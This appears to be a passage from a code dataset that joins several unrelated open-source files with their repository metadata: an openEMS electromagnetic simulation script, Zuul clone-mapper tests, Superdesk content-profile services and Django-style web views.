if structured:
nnx = 4 * Refinement
nny = 4 * Refinement
else:
vertices = [[0.0, 0.0], #0
[L[0], 0.0], #1
[L[0], L[1]], #2
[0.0, L[1]]] #3
vertexFlags = [boundaryTags['bottom'],
boundaryTags['bottom'],
boundaryTags['top'],
boundaryTags['top']]
segments = [[0, 1],
[1, 2],
[2, 3],
[3, 0]]
segmentFlags = [boundaryTags['bottom'],
boundaryTags['right'],
boundaryTags['top'],
boundaryTags['left']]
regions = [[1.2, 0.6]]
regionFlags = [1]
domain = Domain.PlanarStraightLineGraphDomain(vertices=vertices,
vertexFlags=vertexFlags,
segments=segments,
segmentFlags=segmentFlags,
regions=regions,
regionFlags=regionFlags)
#go ahead and add a boundary tags member
domain.boundaryTags = boundaryTags
domain.writePoly("mesh")
domain.writePLY("mesh")
domain.writeAsymptote("mesh")
triangleOptions = "VApq30Dena%8.8f" % (old_div((he ** 2), 2.0),)
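    # Standard Triangle switches (inferred): p = PSLG input, q30 = quality mesh
    # with a 30-degree minimum angle, a = maximum triangle area (here he**2 / 2
    # via the %8.8f substitution); V/A/D/e/n add verbosity, region attributes,
    # conforming Delaunay, edge and neighbor output.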
domain.MeshOptions.nn = nn
domain.MeshOptions.nnx = nnx
domain.MeshOptions.nny = nny
domain.MeshOptions.nnz = nnz
domain.MeshOptions.triangleFlag=0
domain.MeshOptions.triangleOptions=triangleOptions
# Time stepping
T=1.0
dt_fixed = 0.1
dt_init = min(0.1*dt_fixed,0.001)
runCFL=0.33
nDTout = int(round(old_div(T,dt_fixed)))
# Numerical parameters
ns_sed_forceStrongDirichlet = False
if useMetrics:
ns_shockCapturingFactor = 0.5
ns_lag_shockCapturing = True
ns_lag_subgridError = True
ls_shockCapturingFactor = 0.5
ls_lag_shockCapturing = True
ls_sc_uref = 1.0
ls_sc_beta = 1.0
vof_shockCapturingFactor = 0.5
vof_lag_shockCapturing = True
vof_sc_uref = 1.0
vof_sc_beta = 1.0
rd_shockCapturingFactor = 0.5
rd_lag_shockCapturing = False
epsFact_density = 3.0
epsFact_viscosity = epsFact_curvature = epsFact_vof = epsFact_consrv_heaviside = epsFact_consrv_dirac = epsFact_density
epsFact_redistance = 0.33
epsFact_consrv_diffusion = 10.0
redist_Newton = True
kappa_shockCapturingFactor = 0.25
kappa_lag_shockCapturing = True#False
kappa_sc_uref = 1.0
kappa_sc_beta = 1.0
dissipation_shockCapturingFactor = 0.25
dissipation_lag_shockCapturing = True#False
dissipation_sc_uref = 1.0
dissipation_sc_beta = 1.0
else:
ns_shockCapturingFactor = 0.9
ns_lag_shockCapturing = True
ns_lag_subgridError = True
ns_sed_shockCapturingFactor = 0.9
ns_sed_lag_shockCapturing = True
ns_sed_lag_subgridError = True
ls_shockCapturingFactor = 0.9
ls_lag_shockCapturing = True
ls_sc_uref = 1.0
ls_sc_beta = 1.0
vof_shockCapturingFactor = 0.9
vof_lag_shockCapturing = True
vof_sc_uref = 1.0
vof_sc_beta = 1.0
vos_shockCapturingFactor = 0.9
vos_lag_shockCapturing = True
vos_sc_uref = 1.0
vos_sc_beta = 1.0
rd_shockCapturingFactor = 0.9
rd_lag_shockCapturing = False
epsFact_density = 1.5
epsFact_viscosity = epsFact_curvature = epsFact_vof = epsFact_vos = epsFact_consrv_heaviside = epsFact_consrv_dirac = \
epsFact_density
epsFact_redistance = 0.33
epsFact_consrv_diffusion = 0.1
redist_Newton = False
kappa_shockCapturingFactor = 0.9
kappa_lag_shockCapturing = True #False
kappa_sc_uref = 1.0
kappa_sc_beta = 1.0
dissipation_shockCapturingFactor = 0.9
dissipation_lag_shockCapturing = True #False
dissipation_sc_uref = 1.0
dissipation_sc_beta = 1.0
ns_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
ns_sed_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
vof_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
vos_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
ls_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
rd_nl_atol_res = max(1.0e-10, 0.05 * he)
mcorr_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
kappa_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
dissipation_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
phi_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
pressure_nl_atol_res = max(1.0e-10, 0.01 * he ** 2)
#turbulence
ns_closure = 0 #1-classic smagorinsky, 2-dynamic smagorinsky, 3 -- k-epsilon, 4 -- k-omega
ns_sed_closure = 0 #1-classic smagorinsky, 2-dynamic smagorinsky, 3 -- k-epsilon, 4 -- k-omega
# Water. Fake parameters for convergence test
rho_0 = 1.0
nu_0 = 1.0
# Air
rho_1 = 1.0
nu_1 = 1.0
# Sediment
rho_s = rho_0
nu_s = 10000.0*nu_0
dragAlpha = 0.0
# Surface tension
sigma_01 = 0.0
# Gravity
g = [0.0, 0.0]
|
mit
| 6,489,016,684,883,342,000 | 29.96139 | 125 | 0.628008 | false |
dlharmon/pyopenems
|
examples/vert_connector_ms_oshpark.py
|
1
|
2909
|
#!/usr/bin/env python3
import sys
mm = 0.001
import openems
import openems.geometries
import numpy as np
em = openems.OpenEMS('vert_connector_ms_oshpark', EndCriteria = 1e-5, fmin = 0e6, fmax = 50e9,
boundaries = ['PEC', 'PEC', 'PEC', 'PEC', 'PML_12', 'PEC'])
em.fsteps = 1601
copper = openems.Metal(em, 'copper')
pcopper = openems.Metal(em, 'pcopper')
sub1 = openems.Dielectric(em, 'substrate', eps_r=3.2)
sub2 = openems.Dielectric(em, 'substrate', eps_r=4.0)
sub1t = 0.19*mm
sub2t = 1.0*mm
ifoil = 0.0125*mm
ofoil = 0.035*mm
port_length = 0.1*mm
box_length = 2*mm
box_width = 2*mm
ms_width = 0.42*mm
airspace = 1*mm
via_pad = 0.5*mm
via_clearance = 0.275*mm
bt = sub1t + ofoil
bb = -1*(ofoil+sub2t+sub1t)
em.resolution = 25e-6
em.mesh.AddLine('z', sub1t+airspace)
zmin = bb - 1*mm
em.mesh.AddLine('z', zmin)
planar = openems.geometries.planar_full_box(x=[-0.5*box_length, 0.5*box_length],
y=[-0.5*box_width, 0.5*box_width])
clearance_r = via_pad*0.5 + via_clearance
planar.add(sub1, [0, sub1t], priority=1) # sub1 top
planar.add_center_hole(pcopper, [0, ifoil], clearance_r, priority=2) # inner 1 foil
planar.add(sub2, [0, -sub2t], priority=1) # sub2
planar.add(sub1, [-sub2t, -(sub2t+sub1t)], priority=1) # sub1 bottom
planar.add_center_hole(pcopper, [-sub2t, -(sub2t+ifoil)], clearance_r, priority=2) # inner2 foil
planar.add_center_hole(pcopper, [bb, bb+ofoil], 0.75*mm, priority=1) # bottom foil
# ms line
start = np.array([-0.5*box_length+port_length, 0.5*ms_width, sub1t])
stop = np.array([0, -0.5*ms_width, bt])
copper.AddBox(start, stop, priority=9)
# ms port
start = [-0.5*box_length, ms_width/2.0, sub1t]
stop = [-0.5*box_length + port_length, ms_width/-2.0, bt]
openems.Port(em, start, stop, direction='x', z=50)
via_z = [[bt,bb],[bt, bt-ofoil], [0, ifoil], [-sub2t, -sub2t-ifoil], [bb+ofoil, bb]]
# ground vias
for n in range(-3,4):
r = 1 * mm
c = np.exp(1j*2*np.pi*n*22.0/180.0) * r
openems.Via(copper, priority=9, x=np.real(c), y=np.imag(c), z=via_z,
drillradius = 0.25*mm*0.5,
wall_thickness = 25e-6,
padradius = via_pad * 0.5,
padname='2')
# signal via
openems.Via(copper, priority=9, x=0, y=0,
z=[[bt,bb],[bt, bt-ofoil], [0, ifoil], [-sub2t, -sub2t-ifoil], [bb+ofoil, bb]],
drillradius = 0.25*mm*0.5,
wall_thickness = 25e-6,
padradius = via_pad * 0.5,
padname='1')
# coax shield
planar.add_center_hole(copper, [bb, zmin], r=1.5*mm/2.0, priority=1)
pin_diameter = 0.695*mm
coax_port_length = 0.2*mm
# pin
start = np.array([0, 0, bb])
stop = np.array([0, 0, zmin])
copper.AddCylinder(start, stop, 0.5*pin_diameter, priority=9)
# coax goes into Z- PML
command = 'view solve'
if len(sys.argv) > 1:
command = sys.argv[1]
em.write_kicad(em.name)
em.run_openems(command)
|
gpl-3.0
| 2,444,332,735,108,807,000 | 29.302083 | 96 | 0.617051 | false |
wikimedia/integration-zuul
|
tests/test_clonemapper.py
|
2
|
3045
|
# Copyright 2014 Antoine "hashar" Musso
# Copyright 2014 Wikimedia Foundation Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import testtools
from zuul.lib.clonemapper import CloneMapper
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-17s '
'%(levelname)-8s %(message)s')
class TestCloneMapper(testtools.TestCase):
def test_empty_mapper(self):
"""Given an empty map, the slashes in project names are directory
separators"""
cmap = CloneMapper(
{},
[
'project1',
'plugins/plugin1'
])
self.assertEqual(
{'project1': '/basepath/project1',
'plugins/plugin1': '/basepath/plugins/plugin1'},
cmap.expand('/basepath')
)
def test_map_to_a_dot_dir(self):
"""Verify we normalize path, hence '.' refers to the basepath"""
cmap = CloneMapper(
[{'name': 'mediawiki/core', 'dest': '.'}],
['mediawiki/core'])
self.assertEqual(
{'mediawiki/core': '/basepath'},
cmap.expand('/basepath'))
def test_map_using_regex(self):
"""One can use regex in maps and use \\1 to forge the directory"""
cmap = CloneMapper(
[{'name': 'plugins/(.*)', 'dest': 'project/plugins/\\1'}],
['plugins/PluginFirst'])
self.assertEqual(
{'plugins/PluginFirst': '/basepath/project/plugins/PluginFirst'},
cmap.expand('/basepath'))
def test_map_discarding_regex_group(self):
cmap = CloneMapper(
[{'name': 'plugins/(.*)', 'dest': 'project/'}],
['plugins/Plugin_1'])
self.assertEqual(
{'plugins/Plugin_1': '/basepath/project'},
cmap.expand('/basepath'))
def test_cant_dupe_destinations(self):
"""We cant clone multiple projects in the same directory"""
cmap = CloneMapper(
[{'name': 'plugins/(.*)', 'dest': 'catchall/'}],
['plugins/plugin1', 'plugins/plugin2']
)
self.assertRaises(Exception, cmap.expand, '/basepath')
def test_map_with_dot_and_regex(self):
"""Combining relative path and regex"""
cmap = CloneMapper(
[{'name': 'plugins/(.*)', 'dest': './\\1'}],
['plugins/PluginInBasePath'])
self.assertEqual(
{'plugins/PluginInBasePath': '/basepath/PluginInBasePath'},
cmap.expand('/basepath'))
|
apache-2.0
| 6,234,860,600,241,992,000 | 35.25 | 77 | 0.586535 | false |
ioanpocol/superdesk-core
|
apps/content_types/content_types.py
|
1
|
17217
|
import re
import bson
import superdesk
from eve.utils import config
from copy import deepcopy
from superdesk import get_resource_service
from superdesk.errors import SuperdeskApiError
from superdesk.default_schema import DEFAULT_SCHEMA, DEFAULT_EDITOR
from apps.auth import get_user_id
from apps.templates.content_templates import remove_profile_from_templates
from apps.desks import remove_profile_from_desks
from eve.utils import ParsedRequest
from superdesk.resource import build_custom_hateoas
CONTENT_TYPE_PRIVILEGE = 'content_type'
DO_NOT_SHOW_SELECTION = 'do not show'
# Fields that might not be in the schema but should be still available in formatter/output
REQUIRED_FIELDS = (
'language',
)
# Valid editor keys
EDITOR_ATTRIBUTES = (
'order',
'sdWidth',
'required',
'hideDate',
'showCrops',
'formatOptions',
'editor3',
'default',
'cleanPastedHTML',
'imageTitle',
'sourceField',
'section',
)
class ContentTypesResource(superdesk.Resource):
schema = {
'_id': {
'type': 'string',
'iunique': True,
},
'label': {
'type': 'string',
'iunique': True,
},
'description': {
'type': 'string',
},
'schema': {
'type': 'dict'
},
'editor': {
'type': 'dict'
},
'widgets_config': {
'type': 'list',
'schema': {
'type': 'dict',
'schema': {
'widget_id': {'type': 'string'},
'is_displayed': {'type': 'boolean'}
}
}
},
'priority': {
'type': 'integer',
'default': 0,
},
'enabled': {
'type': 'boolean',
'default': False,
},
'is_used': {
'type': 'boolean',
'default': False,
},
'created_by': superdesk.Resource.rel('users', nullable=True),
'updated_by': superdesk.Resource.rel('users', nullable=True),
}
item_url = r'regex("[\w,.:-]+")'
privileges = {'POST': CONTENT_TYPE_PRIVILEGE,
'PATCH': CONTENT_TYPE_PRIVILEGE,
'DELETE': CONTENT_TYPE_PRIVILEGE}
datasource = {
'default_sort': [('priority', -1)],
}
class ContentTypesService(superdesk.Service):
def _set_updated_by(self, doc):
doc['updated_by'] = get_user_id()
def _set_created_by(self, doc):
doc['created_by'] = get_user_id()
def on_create(self, docs):
for doc in docs:
self._set_updated_by(doc)
self._set_created_by(doc)
def on_delete(self, doc):
if doc.get('is_used'):
raise SuperdeskApiError(status_code=202, payload={"is_used": True})
remove_profile_from_templates(doc)
remove_profile_from_desks(doc)
def on_update(self, updates, original):
self._validate_disable(updates, original)
self._set_updated_by(updates)
prepare_for_save_content_type(original, updates)
self._update_template_fields(updates, original)
def on_delete_res_vocabularies(self, doc):
req = ParsedRequest()
req.projection = '{"label": 1}'
res = self.get(req=req, lookup={'schema.' + doc[config.ID_FIELD]: {'$type': 3}})
if res.count():
payload = {'content_types': [doc_hateoas for doc_hateoas in map(self._build_hateoas, res)]}
message = 'Vocabulary "%s" is used in %d content type(s)' % \
(doc.get('display_name'), res.count())
raise SuperdeskApiError.badRequestError(message, payload)
def _build_hateoas(self, doc):
build_custom_hateoas({'self': {'title': 'Content Profile', 'href': '/content_types/{_id}'}}, doc)
return doc
def _validate_disable(self, updates, original):
"""
Checks the templates and desks that are referencing the given
content profile if the profile is being disabled
"""
if 'enabled' in updates and updates.get('enabled') is False and original.get('enabled') is True:
templates = list(superdesk.get_resource_service('content_templates').
get_templates_by_profile_id(original.get('_id')))
if len(templates) > 0:
template_names = ', '.join([t.get('template_name') for t in templates])
raise SuperdeskApiError.badRequestError(
message='Cannot disable content profile as following templates are referencing: {}'.
format(template_names))
req = ParsedRequest()
all_desks = list(superdesk.get_resource_service('desks').get(req=req, lookup={}))
profile_desks = [desk for desk in all_desks if
desk.get('default_content_profile') == str(original.get('_id'))]
if len(profile_desks) > 0:
profile_desk_names = ', '.join([d.get('name') for d in profile_desks])
raise SuperdeskApiError.badRequestError(
message='Cannot disable content profile as following desks are referencing: {}'.
format(profile_desk_names))
def _update_template_fields(self, updates, original):
"""
Finds the templates that are referencing the given
        content profile and clears the disabled fields
"""
templates = list(superdesk.get_resource_service('content_templates').
get_templates_by_profile_id(original.get('_id')))
for template in templates:
data = deepcopy(template.get('data', {}))
schema = updates.get('schema', {})
processed = False
for field, params in schema.items():
if not params or not params.get('enabled', True):
data.pop(field, None)
processed = True
if processed:
superdesk.get_resource_service('content_templates').patch(template.get('_id'), {'data': data})
def find_one(self, req, **lookup):
doc = super().find_one(req, **lookup)
if doc and req and 'edit' in req.args:
prepare_for_edit_content_type(doc)
if doc:
clean_doc(doc)
return doc
def set_used(self, profile_ids):
"""Set `is_used` flag for content profiles.
:param profile_ids
"""
query = {'_id': {'$in': list(profile_ids)}, 'is_used': {'$ne': True}}
update = {'$set': {'is_used': True}}
self.find_and_modify(query=query, update=update)
def get_output_name(self, profile):
try:
_id = bson.ObjectId(profile)
item = self.find_one(req=None, _id=_id) or {}
return re.compile('[^0-9a-zA-Z_]').sub('', item.get('label', str(_id)))
except bson.errors.InvalidId:
return profile
def clean_doc(doc):
schema = doc.get('schema', {})
editor = doc.get('editor', {})
vocabularies = get_resource_service('vocabularies').get_forbiden_custom_vocabularies()
for vocabulary in vocabularies:
field = vocabulary.get('schema_field', vocabulary['_id'])
if schema.get(field):
del schema[field]
if editor.get(field):
del editor[field]
clean_json(schema)
clean_json(editor)
def clean_json(json):
if not isinstance(json, dict):
return
for key in list(json.keys()):
value = json[key]
if value is None:
del json[key]
else:
clean_json(value)
def prepare_for_edit_content_type(doc):
clean_doc(doc)
init_default(doc)
editor = doc['editor']
schema = doc['schema']
fields_map, field_names = get_fields_map_and_names()
init_custom(editor, schema, fields_map)
expand_subject(editor, schema, fields_map)
set_field_name(editor, field_names)
init_extra_fields(editor, schema)
def init_extra_fields(editor, schema):
fields = get_resource_service('vocabularies').get_extra_fields()
for field in fields:
field_type = field.get('field_type')
schema.setdefault(field['_id'], {
'type': field_type,
'required': False
})
if field['_id'] in editor:
editor[field['_id']]['enabled'] = True
else:
editor[field['_id']] = {'enabled': False}
editor[field['_id']]['field_name'] = field['display_name']
def get_allowed_list(schema):
try:
return schema['schema']['schema']['scheme']['allowed']
except KeyError:
return []
def get_mandatory_list(schema):
return schema['mandatory_in_list']['scheme']
def get_fields_map_and_names():
vocabularies = get_resource_service('vocabularies').get_custom_vocabularies()
fields_map = {}
field_names = {}
for vocabulary in vocabularies:
if vocabulary.get('selection_type') == DO_NOT_SHOW_SELECTION:
continue
fields_map[vocabulary.get('schema_field', vocabulary['_id'])] = vocabulary['_id']
field_names[vocabulary['_id']] = vocabulary.get('display_name', vocabulary['_id'])
return fields_map, field_names
def init_default(doc):
editor = doc['editor'] = doc.get('editor', None)
schema = doc['schema'] = doc.get('schema', None)
if editor and schema:
for field in DEFAULT_EDITOR:
# add missing fields in editor with enabled = false
if editor.get(field, None) is None:
editor[field] = deepcopy(DEFAULT_EDITOR[field])
editor[field]['enabled'] = False
if schema.get(field, None) is None:
schema[field] = deepcopy(DEFAULT_SCHEMA[field])
else:
editor[field]['enabled'] = True
else:
doc['editor'] = deepcopy(DEFAULT_EDITOR)
doc['schema'] = deepcopy(DEFAULT_SCHEMA)
def init_custom(editor, schema, fields_map):
# process custom fields defined on vocabularies
for old_field, field in fields_map.items():
if field != old_field:
if (editor.get(field, None)):
editor[field]['enabled'] = True
# custom storage for field, replace default editor with custom one
replace_key(editor, old_field, field)
replace_key(schema, old_field, field)
else:
# fields are stored in subject so add new custom editor
schema[field] = {'type': 'list', 'required': False}
if editor.get(field, None):
editor[field]['enabled'] = True
else:
editor[field] = {'enabled': False}
def replace_key(dictionary, oldKey, newKey):
if dictionary.get(oldKey, None):
if not dictionary.get(newKey, None):
dictionary[newKey] = deepcopy(dictionary[oldKey])
del dictionary[oldKey]
elif not dictionary.get(newKey, None):
dictionary[newKey] = {}
def expand_subject(editor, schema, fields_map):
subject = get_subject_name(fields_map)
allowed = get_allowed_list(schema[subject])
mandatory = get_mandatory_list(schema[subject])
default_values = schema[subject].get('default', [])
schema[subject]['schema'] = {}
set_enabled_for_custom(editor, allowed, fields_map)
set_required_for_custom(editor, schema, mandatory, fields_map)
set_default_for_custom(schema, default_values, fields_map)
def set_enabled_for_custom(editor, allowed, fields_map):
for field in allowed:
editor[fields_map.get(field, field)]['enabled'] = True
def set_required_for_custom(editor, schema, mandatory, fields_map):
for field, value in mandatory.items():
if field == value or field == 'subject':
try:
editor[fields_map.get(field, field)]['required'] = value is not None
schema[fields_map.get(field, field)]['required'] = value is not None
except KeyError:
continue
def set_default_for_custom(schema, default_values, fields_map):
for old_field, field in fields_map.items():
if (field == old_field or old_field == 'subject') and schema.get(field, None) is not None:
default = []
for value in default_values:
if value.get('scheme', None) == field:
default.append(value)
schema[field]['default'] = default
def get_subject_name(fields_map):
return fields_map.get('subject', 'subject')
def set_field_name(editor, field_names):
for (field, name) in field_names.items():
editor[field]['field_name'] = name
def prepare_for_save_content_type(original, updates):
editor = updates['editor'] = updates.get('editor', {})
schema = updates['schema'] = updates.get('schema', {})
original = deepcopy(original)
prepare_for_edit_content_type(original)
concatenate_dictionary(original['editor'], editor)
concatenate_dictionary(original['schema'], schema)
delete_disabled_fields(editor, schema)
fields_map, _ = get_fields_map_and_names()
clean_editor(editor)
init_schema_for_custom_fields(schema, fields_map)
compose_subject_schema(schema, fields_map)
if not editor.get("subject"):
# subject must not be mandatory if not present in editor
# Note that it can still be used for custom vocabularies
try:
schema["subject"]["required"] = False
except (TypeError, KeyError):
pass
init_editor_required(editor, schema)
rename_schema_for_custom_fields(schema, fields_map)
def concatenate_dictionary(source, destination):
for key in source:
if key not in destination:
destination[key] = source[key]
def delete_disabled_fields(editor, schema):
for field, value in editor.items():
if value is None or not value.get('enabled', False):
editor[field] = None
schema[field] = None
def clean_editor(editor):
for field_value in editor.values():
if not field_value:
continue
for attribute in list(field_value.keys()):
if attribute not in EDITOR_ATTRIBUTES:
del field_value[attribute]
def compose_subject_schema(schema, fields_map):
mandatory = {}
allowed = []
default = []
for old_field, field in fields_map.items():
if (old_field == field or old_field == 'subject') and schema.get(field, None):
allowed.append(field)
if schema[field].get('required', False):
mandatory[old_field] = field
else:
mandatory[old_field] = None
if schema[field].get('default', None):
default.extend(schema[field]['default'])
else:
mandatory[old_field] = None
if allowed:
init_subject_schema(schema, default, mandatory, allowed, fields_map)
def init_subject_schema(schema, default, mandatory, allowed, fields_map):
subject = get_subject_name(fields_map)
try:
is_required = schema['subject']['required']
except (KeyError, TypeError):
is_required = DEFAULT_SCHEMA['subject'].get('required', False)
schema[subject] = deepcopy(DEFAULT_SCHEMA['subject'])
schema[subject]['default'] = default
schema[subject]['mandatory_in_list']['scheme'] = mandatory
schema[subject]['schema']['schema']['scheme']['allowed'] = allowed
if 'subject' in mandatory: # custom subject field
schema[subject]['required'] = mandatory.get('subject') is not None
else:
schema[subject]['required'] = is_required
def init_editor_required(editor, schema):
for field in schema:
if editor.get(field) and schema.get(field) and schema[field].get('required') is not None:
schema[field]['nullable'] = not schema[field]['required']
def init_schema_for_custom_fields(schema, fields_map):
for field in fields_map.values():
if schema.get(field, None) and schema[field].get('default', None):
list_values = schema[field]['default']
for value in list_values:
value['scheme'] = field
def rename_schema_for_custom_fields(schema, fields_map):
for old_field, field in fields_map.items():
if field in schema:
if old_field != field:
schema[old_field] = schema[field]
del schema[field]
def is_enabled(field, schema):
"""Return true if field is enabled using given schema.
:param field: field name
:param schema: schema dict
"""
return schema.get(field) or schema.get(field) == {} or field not in DEFAULT_SCHEMA or field in REQUIRED_FIELDS
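# Quick check of the rule above (derived directly from the code): a field in
# REQUIRED_FIELDS is always kept, e.g. is_enabled('language', {}) is truthy
# even with an empty schema.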
def apply_schema(item):
"""Return item without fields that should not be there given it's profile.
:param item: item to apply schema to
"""
if item.get('type') == 'event':
return item.copy()
try:
profile = get_resource_service('content_types').find_one(req=None, _id=item['profile'])
schema = profile['schema']
except Exception:
schema = DEFAULT_SCHEMA
return {key: val for key, val in item.items() if is_enabled(key, schema)}
|
agpl-3.0
| 6,055,187,326,843,069,000 | 33.434 | 114 | 0.59296 | false |
jonyachen/hearboi
|
hearboi.py
|
1
|
1045
|
import warnings
import json
warnings.filterwarnings("ignore")
from dejavu import Dejavu
from dejavu.recognize import FileRecognizer, MicrophoneRecognizer
config = {
"database": {
"host": "127.0.0.1",
"user": "root",
"passwd": "M914ktIkP!",
"db": "sound_db",
}
}
if __name__ == '__main__':
# create a Dejavu instance
djv = Dejavu(config)
# Fingerprint all the mp3's in the directory we give it
djv.fingerprint_directory("sounds", [".wav"])
# Prints total number of fingerprints - for debugging
#print djv.db.get_num_fingerprints()
# Recognize audio from a file
#song = djv.recognize(FileRecognizer, "sounds/fire_alarm.wav")
#print "From file we recognized: %s\n" % song
# Or recognize audio from your microphone for `secs` seconds
secs = 5
song = djv.recognize(MicrophoneRecognizer, seconds=secs)
if song is None:
print "Nothing recognized -- did you play the song out loud so your mic could hear it? :)"
else:
print "From mic with %d seconds we recognized: %s\n" % (secs, song)
|
mit
| -1,106,891,391,869,320,800 | 26.5 | 92 | 0.680383 | false |
lsbardel/flow
|
flow/web/applications/data.py
|
1
|
4207
|
import platform
from djpcms.core.exceptions import ObjectDoesNotExist
from djpcms.conf import settings
from djpcms.utils.ajax import jhtmls
from djpcms.views import appsite, appview
from djpcms.views.apps.tagging import TagApplication
from dynts.web.views import TimeSeriesView as TimeSeriesViewBase
import unuk
from unuk.http import httplib
from unuk.core.jsonrpc import Proxy
unuk.importlib('servermachine')
from servermachine.forms import ServerForm, ServerMachine
from jflow.db.instdata.models import DataId, EconometricAnalysis, VendorId
from jflow.web import forms
class TimeSeriesView(TimeSeriesViewBase):
def getdata(self, request, code, start, end):
try:
p = self.appmodel.proxy()
return p.raw_parsets(code = code, start = start, end = end)
except Exception, e:
return str(e)
def codeobject(self, object):
return object.code
def change_type(self, djp):
    '''Ajax view to change instrument form'''
    form = self.get_form(djp, withdata = False)
    forms = list(form.forms_only())
    if len(forms) == 2:
        form = forms[1]
        html = form.layout.render(form)
    else:
        html = ''
    return jhtmls(html = html, identifier = '.data-id-instrument')
class DataAddView(appview.AddView):
def ajax__content_type(self, djp):
return change_type(self,djp)
class DataEditView(appview.EditView):
def ajax__content_type(self, djp):
return change_type(self,djp)
def title(self, page, **urlargs):
return u'edit'
slug_regex = '(?P<id>[-\.\w]+)'
class DataApplication(TagApplication):
inherit = True
form = forms.NiceDataIdForm
form_template = 'instdata/dataid_change_form.html'
search_fields = ['code','name','description','tags','isin']
rpc_server_name = 'jflow-rpc'
rpc_server_timeout = None
timeserie = TimeSeriesView(regex = 'timeseries')
complete = appview.AutocompleteView()
add = DataAddView(regex = 'add', isplugin = False)
view = appview.ViewView(regex = slug_regex, parent = None)
edit = DataEditView()
def objectbits(self, obj):
return {'id': obj.code}
def get_object(self, *args, **kwargs):
try:
id = kwargs.get('id',None)
return self.model.objects.get(code = id)
except:
return None
def get_form(self, djp, form_class, withdata = True, initial = None, **kwargs):
if not withdata:
initial = initial or {}
initial.update(dict(djp.request.POST.items()))
f = super(DataApplication,self).get_form(djp, form_class, initial = initial, withdata = withdata, **kwargs)
dataform = f.forms[0][1]
iform = dataform.content_form()
if iform:
f.add(iform)
return f
def object_from_form(self, form):
if len(form.forms) == 2:
form.forms.pop()
return super(DataApplication,self).object_from_form(form)
def proxy(self, client = 'web'):
server = ServerMachine.objects.get_for_machine(self.rpc_server_name)
if not server:
raise ObjectDoesNotExist('Server %s is not in database' % self.rpc_server_name)
http = httplib(timeout = self.rpc_server_timeout, cache = '.cache')
return Proxy(server.path(), http = http)
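    # Note (inferred): the proxy targets the JSON-RPC endpoint registered in
    # the ServerMachine table under rpc_server_name, caching HTTP responses in
    # a local '.cache' directory.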
class EconometricApplication(TagApplication):
inherit = True
form = forms.EconometricForm
form_withrequest = True
add = appview.AddView(regex = 'add')
#edit = appview.EditView(regex = 'edit/(?P<id>\d+)', parent = None)
view = appview.ViewView(regex = '(?P<id>[-\.\w]+)')
class ServerApplication(appsite.ModelApplication):
name = 'Server Monitor'
form = ServerForm
search = appview.SearchView()
add = appview.AddView(regex = 'add', isapp = False)
def object_content(self, djp, obj):
c = super(ServerApplication,self).object_content(djp, obj)
c['info'] = obj.get_info()
return c
def basequery(self, request, **kwargs):
return self.model.objects.filter(machine = platform.node())
|
bsd-3-clause
| 6,784,104,891,990,057,000 | 30.17037 | 115 | 0.631091 | false |
CredoReference/edx-platform
|
common/djangoapps/credo_modules/views.py
|
1
|
6104
|
import json
from collections import OrderedDict
from courseware.courses import get_course_by_id
from django.db import transaction
from django.http import Http404
from django.shortcuts import redirect
from django.core.urlresolvers import resolve, reverse, NoReverseMatch
from django.views.generic.base import View
from django.contrib.auth.decorators import login_required
from django.utils.http import urlunquote
from django.utils.decorators import method_decorator
from credo_modules.models import CredoModulesUserProfile
from credo_modules.utils import additional_profile_fields_hash
from util.json_request import JsonResponse
from edxmako.shortcuts import render_to_response
from opaque_keys.edx.keys import CourseKey
class StudentProfileField(object):
alias = ""
required = False
title = ""
default = ""
options = []
order = None
def __init__(self, alias="", required=False, title="", default="", options=None, order=None, info=False):
self.alias = alias
self.required = required
self.title = title
self.default = default
self.options = options
self.order = order
self.info = info
@classmethod
def init_from_course(cls, course, default_fields=None):
res_unsorted = OrderedDict()
for k, v in course.credo_additional_profile_fields.iteritems():
order = None
try:
order = int(v['order']) if 'order' in v else None
except ValueError:
pass
kwargs = {
'alias': k,
'required': v['required'] if 'required' in v and v['required'] else False,
'title': v['title'] if 'title' in v and v['title'] else k,
'default': default_fields[k] if default_fields and (k in default_fields) else v.get('default'),
'options': v['options'] if 'options' in v and v['options'] else None,
'order': order,
'info': bool(v.get('info'))
}
res_unsorted[k] = StudentProfileField(**kwargs)
return OrderedDict(sorted(res_unsorted.items(), key=lambda t: t[1].order if t[1].order is not None else t[0]))
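# Shape of course.credo_additional_profile_fields assumed by the parser above
# (a hypothetical example, not taken from a real course):
#   {"student_id": {"title": "Student ID", "required": True,
#                   "default": "", "options": None, "order": 1}}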
def show_student_profile_form(request, course, simple_layout=False, redirect_to=None):
course_key = course.id
profiles = CredoModulesUserProfile.objects.filter(user=request.user, course_id=course_key)
if len(profiles) > 0:
profile = profiles[0]
profile_fields = json.loads(profile.meta)
else:
profile_fields = {}
fields = StudentProfileField.init_from_course(course, profile_fields)
context = {
'fields': fields.values(),
'redirect_url': redirect_to if redirect_to else '',
'course_id': unicode(course.id),
}
if simple_layout:
context.update({
'disable_accordion': True,
'allow_iframing': True,
'disable_header': True,
'disable_footer': True,
'disable_window_wrap': True,
'disable_preview_menu': True,
})
return render_to_response("credo_additional_profile.html", context)
class StudentProfileView(View):
@method_decorator(login_required)
@method_decorator(transaction.atomic)
def get(self, request, course_id):
redirect_to = request.GET.get('next', None)
course_key = CourseKey.from_string(course_id)
course = get_course_by_id(course_key)
simple_layout = False
views_with_simple_layout = ('render_xblock_course', 'lti_launch')
if not course.credo_additional_profile_fields:
if not redirect_to:
try:
redirect_to = reverse('dashboard')
except NoReverseMatch:
redirect_to = reverse('home')
else:
redirect_to = urlunquote(redirect_to)
return redirect(redirect_to)
if redirect_to:
try:
redirect_url_info = resolve(redirect_to)
